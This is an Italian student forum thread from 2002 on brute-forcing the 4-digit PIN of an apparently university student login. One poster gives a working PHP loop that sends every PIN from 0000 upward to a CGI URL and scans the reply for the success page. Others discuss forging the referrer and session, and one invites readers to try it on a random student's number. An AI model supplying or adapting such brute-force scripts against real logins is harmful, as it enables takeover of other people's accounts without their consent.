 |
 Mino |
| vecchia. :)
... |
25-11-2002 11:53 |
|
 |
Mino |
In pensione :)
Registered: Mar 2002
Posts: 2997 (0.34 al dì)
Location: Dublin!
Corso: Informatica 3ennale
Anno: Laureato :)
Time Online: 12 Days, 2:11:07: [...]
Status: Offline
Edit | Report | IP: Logged |
vecchia. 
un pin di 4 cifre, con un 56k e un 386 lo sgami in una 30ina di secondi se non ci sono politiche di disabilitazione dopo x tentativi oppure un ritardo dopo l'nesimo errore.
__________________
icq: 57553717 - mail: mino@ngi.it - web: www.minux.it - Fattori Arcani
|
|
25-11-2002 11:53 |
|
|
| |
|
| Lord |
| Pardon, ma come funzionerebbe un programma che pro ... |
26-11-2002 12:43 |
|
|
Lord |
.consigliere.
Registered: Jul 2002
Posts: 115 (0.01 al dì)
Location: Pavia
Corso: informatica
Anno: 4
Time Online: 12:06:59 [...]
Status: Offline
Edit | Report | IP: Logged |
Pardon, ma come funzionerebbe un programma che provi diverse combinazioni? Ovvero: costruire un programmino in c che generi e provi vari numeri sono capace anche io. Come però inviare il numero generato al sito e "leggere" la risposta?
int main (void)
{
int n = 0; bool don't_connect = false;
while (don't_connect==false) { genera_numero(&n); don't_connect = prova_numero(&n);}
genera_danno(); 8-)
}
|
|
26-11-2002 12:43 |
|
|
| |
|
| URANIO |
| Probabilmente la login viene inviato attraverso un ... |
26-11-2002 21:42 |
|
|
URANIO |
.utente.radioattivo
Registered: Nov 2001
Posts: 1011 (0.11 al dì)
Location: Casalpusterlengo (LO)
Corso: TICo
Anno: 1°
Time Online: 11 Days, 6:12:08: [...]
Status: Offline
Edit | Report | IP: Logged |
Probabilmente la login viene inviato attraverso un comando post o get al server .....quindi basta controllare la form e fare l'invio!
Per controllare basta vedere quello ch ti rimanda il server..almeno penso!
__________________
BinarySun
"L'intelligenza è una pianta che va curata continuamente.
Dovreste vedere com'è bello, il mio bonsai."
Rat-man®
|
|
26-11-2002 21:42 |
|
|
| |
|
| Mino |
| isi...
... |
26-11-2002 22:26 |
|
|
Mino |
In pensione :)
Registered: Mar 2002
Posts: 2997 (0.34 al dì)
Location: Dublin!
Corso: Informatica 3ennale
Anno: Laureato :)
Time Online: 12 Days, 2:11:07: [...]
Status: Offline
Edit | Report | IP: Logged |
isi...
se il form non fa un controllo del referrer basta un fopen in php
PHP:
$trovato = 0;
$pin = 0;
while(!$trovato) {
$url=sprintf("http://www.dominio.it/path/del/cgi?matr=123123&pin=%04d",$pin);
$pin++;
$fp = fopen($url,"r");
if (!$fp) {
echo "squaraus!";
exit(-1);
}
$line = fgets ($fp, 1024); // ecc ecc
// banalissima regexp che valuta l'output in $line cercando un pezzo di html che appare nella pagina di successo
// se lo trova pone $trovato=1
fclose($fp);
}
echo "Il pin è $pin\n";
altrimenti è altrettanto stupido, basta una fsockopen per aprire una socket su www.dominio.it alla porta 80 e quindi passare i vari parametri ("GET /path/blabla...")...
__________________
icq: 57553717 - mail: mino@ngi.it - web: www.minux.it - Fattori Arcani
|
|
26-11-2002 22:26 |
|
|
| |
|
| drakend |
| Mino ma dopo tre errori l'account viene disabilita ... |
26-11-2002 23:48 |
|
|
drakend |
.grande:maestro.
Registered: Oct 2002
Posts: 1857 (0.22 al dì)
Location:
Corso:
Anno:
Time Online: 11 Days, 16:15:18 [...]
Status: Offline
Edit | Report | IP: Logged |
Mino ma dopo tre errori l'account viene disabilitato o no?
Il referrer dovrebbe essere l'url da cui si proviene: in questa ipotesi non si può alterare la url di provenienza in modo da farla apparire "legale"?
|
|
26-11-2002 23:48 |
|
|
| |
|
| Mino |
| la disabilitazione dopo x tentativi non so se ci s ... |
27-11-2002 12:44 |
|
|
Mino |
In pensione :)
Registered: Mar 2002
Posts: 2997 (0.34 al dì)
Location: Dublin!
Corso: Informatica 3ennale
Anno: Laureato :)
Time Online: 12 Days, 2:11:07: [...]
Status: Offline
Edit | Report | IP: Logged |
la disabilitazione dopo x tentativi non so se ci sia. lo spero vivamente...
falsificare referrer e session è una delle cose più banali che si possan fare
tempo fa scrissi per me uno scrippettino chiamato "enblue" per inviare sms da blu.it via shell: si loggava sulla homepage, simulava il click su "invia sms", compilava il modulo e controllava i risultati...
__________________
icq: 57553717 - mail: mino@ngi.it - web: www.minux.it - Fattori Arcani
|
|
27-11-2002 12:44 |
|
|
| |
|
| URANIO |
| Secondo me non viene bloccata dopo 3 tentativi!
... |
27-11-2002 22:45 |
|
|
URANIO |
.utente.radioattivo
Registered: Nov 2001
Posts: 1011 (0.11 al dì)
Location: Casalpusterlengo (LO)
Corso: TICo
Anno: 1°
Time Online: 11 Days, 6:12:08: [...]
Status: Offline
Edit | Report | IP: Logged |
Secondo me non viene bloccata dopo 3 tentativi!
...se volete provare inserite una matricola a caso e provate (non la mia  )
__________________
BinarySun
"L'intelligenza è una pianta che va curata continuamente.
Dovreste vedere com'è bello, il mio bonsai."
Rat-man®
|
|
27-11-2002 22:45 |
|
|
| |
|
| LoneWolf |
| [QUOTE][i]Originally posted by URANIO [/i]
... |
28-11-2002 20:43 |
|
|
LoneWolf |
.grande:maestro.
Registered: Nov 2001
Posts: 883 (0.10 al dì)
Location:
Corso: Informatica
Anno: Boh!
Time Online: 2 Days, 0:35:31 [...]
Status: Offline
Edit | Report | IP: Logged |
Originally posted by URANIO
Secondo me non viene bloccata dopo 3 tentativi!
...se volete provare inserite una matricola a caso e provate (non la mia )
Evitate anche il mio...
__________________
"It is totally natural to die or to be killed, rather than just to live without a certain purpose"
|
|
28-11-2002 20:43 |
|
|
| |
|
| All times are GMT. The time now is 05:41. |
|
|
 |
|
 |
|
|
| |
Forum Rules:
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
|
HTML code is OFF
vB code is ON
Smilies are ON
[IMG] code is ON
|
|
|
|
|
|
Mino
